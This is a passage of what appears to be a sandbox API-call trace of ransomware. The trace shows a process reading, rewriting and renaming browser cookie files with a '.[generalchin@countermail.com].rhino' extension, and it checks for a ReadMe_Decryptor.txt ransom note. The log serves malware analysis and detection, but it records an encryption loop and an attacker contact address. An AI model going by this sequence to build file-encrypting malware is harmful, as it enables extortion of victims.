dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0089.955] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0xb2 [0089.955] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1d2, nNumberOfBytesToLockHigh=0x0) returned 1 [0089.955] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.955] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0089.957] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.957] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0xb2, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0xb2, lpOverlapped=0x0) returned 1 [0089.957] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0089.957] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.957] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0089.957] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0089.957] GetLastError () returned 0x0 [0089.958] SetLastError (dwErrCode=0x0) [0089.958] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0089.958] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb2) returned 0x23b00f0 [0089.958] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0089.958] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b01b0 [0089.958] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b02b8 [0089.958] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b01b0 | out: hHeap=0x6d0000) returned 1 [0089.958] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.958] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0089.958] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0089.958] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.958] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0089.958] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0089.958] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0089.958] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.958] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0089.958] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0089.958] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df140 [0089.958] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0089.959] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0089.959] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0089.959] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0089.959] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0089.959] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0089.959] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0089.959] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0089.959] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0089.959] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0089.959] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0089.959] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0089.959] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0089.959] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0089.959] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0089.959] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x23b01b0 [0089.959] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0089.959] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1d2) returned 0x23b0440 [0089.959] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b01b0 | out: hHeap=0x6d0000) returned 1 [0089.959] WriteFile (in: hFile=0xec, lpBuffer=0x23b0440*, nNumberOfBytesToWrite=0x1d2, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x23b0440*, lpNumberOfBytesWritten=0x2cfa04*=0x1d2, lpOverlapped=0x0) returned 1 [0089.960] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0440 | out: hHeap=0x6d0000) returned 1 [0089.960] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1d2, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0089.960] CloseHandle (hObject=0xec) returned 1 [0089.966] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x23b01b0 [0089.966] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x166) returned 0x23b0440 [0089.966] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b01b0 | out: hHeap=0x6d0000) returned 1 [0089.966] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0089.967] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0440 | out: hHeap=0x6d0000) returned 1 [0089.967] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b02b8 | out: hHeap=0x6d0000) returned 1 [0089.967] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0089.967] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b00f0 [0089.967] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0089.967] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b0048 [0089.967] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x23b0198 [0089.967] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0089.967] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.968] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0089.968] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0090.078] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0xd7 [0090.078] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1f7, nNumberOfBytesToLockHigh=0x0) returned 1 [0090.078] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.078] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0090.079] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.080] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0xd7, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0xd7, lpOverlapped=0x0) returned 1 [0090.080] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0090.080] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.080] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0090.080] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0090.080] GetLastError () returned 0x0 [0090.080] SetLastError (dwErrCode=0x0) [0090.081] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0090.081] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd7) returned 0x23b0198 [0090.081] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0090.081] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b0278 [0090.081] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b0380 [0090.081] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0278 | out: hHeap=0x6d0000) returned 1 [0090.081] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.081] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0090.081] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0090.081] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.081] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0090.081] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0090.081] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0090.081] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.081] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0090.081] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0090.081] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0090.081] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.081] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df140 [0090.081] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0090.081] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0090.082] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0090.082] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0090.082] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0090.082] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0090.082] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0090.082] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0090.082] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0090.082] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0090.082] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0090.082] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0090.082] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0090.082] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x23b0278 [0090.082] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0090.082] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x23b0508 [0090.082] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0278 | out: hHeap=0x6d0000) returned 1 [0090.082] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1f7) returned 0x23b0650 [0090.082] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0508 | out: hHeap=0x6d0000) returned 1 [0090.082] WriteFile (in: hFile=0x104, lpBuffer=0x23b0650*, nNumberOfBytesToWrite=0x1f7, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x23b0650*, lpNumberOfBytesWritten=0x2cfa04*=0x1f7, lpOverlapped=0x0) returned 1 [0090.082] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0650 | out: hHeap=0x6d0000) returned 1 [0090.082] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1f7, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0090.083] CloseHandle (hObject=0x104) returned 1 [0090.084] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x23b0278 [0090.084] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x166) returned 0x23b0508 [0090.084] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0278 | out: hHeap=0x6d0000) returned 1 [0090.084] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0090.213] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0508 | out: hHeap=0x6d0000) returned 1 [0090.213] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0380 | out: hHeap=0x6d0000) returned 1 [0090.213] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0090.213] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b0048 [0090.213] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0090.213] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b00f0 [0090.213] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x23b0198 [0090.213] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0090.213] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.213] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0090.213] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0090.213] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0xa9 [0090.213] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1c9, nNumberOfBytesToLockHigh=0x0) returned 1 [0090.214] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.214] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0090.215] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.216] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0xa9, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0xa9, lpOverlapped=0x0) returned 1 [0090.216] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0090.216] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.216] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0090.216] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0090.216] GetLastError () returned 0x0 [0090.216] SetLastError (dwErrCode=0x0) [0090.216] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0090.216] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa9) returned 0x6e9870 [0090.216] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0090.216] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b00f0 [0090.216] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b01f8 [0090.216] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0090.216] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.216] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0090.217] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0090.217] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.217] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0090.217] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0090.217] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0090.217] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.217] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0090.217] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0090.217] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df140 [0090.217] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.217] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0090.217] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0090.217] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0090.217] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0090.217] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0090.217] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0090.217] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0090.218] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0090.218] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0090.218] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0090.218] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0090.218] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0090.218] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0090.218] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0090.218] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x23b00f0 [0090.218] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0090.218] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c9) returned 0x23b0380 [0090.218] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0090.218] WriteFile (in: hFile=0x104, lpBuffer=0x23b0380*, nNumberOfBytesToWrite=0x1c9, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x23b0380*, lpNumberOfBytesWritten=0x2cfa04*=0x1c9, lpOverlapped=0x0) returned 1 [0090.218] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0380 | out: hHeap=0x6d0000) returned 1 [0090.218] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1c9, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0090.218] CloseHandle (hObject=0x104) returned 1 [0090.220] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x23b00f0 [0090.220] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x166) returned 0x23b0380 [0090.220] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0090.220] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0090.221] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0380 | out: hHeap=0x6d0000) returned 1 [0090.221] HeapFree (in: 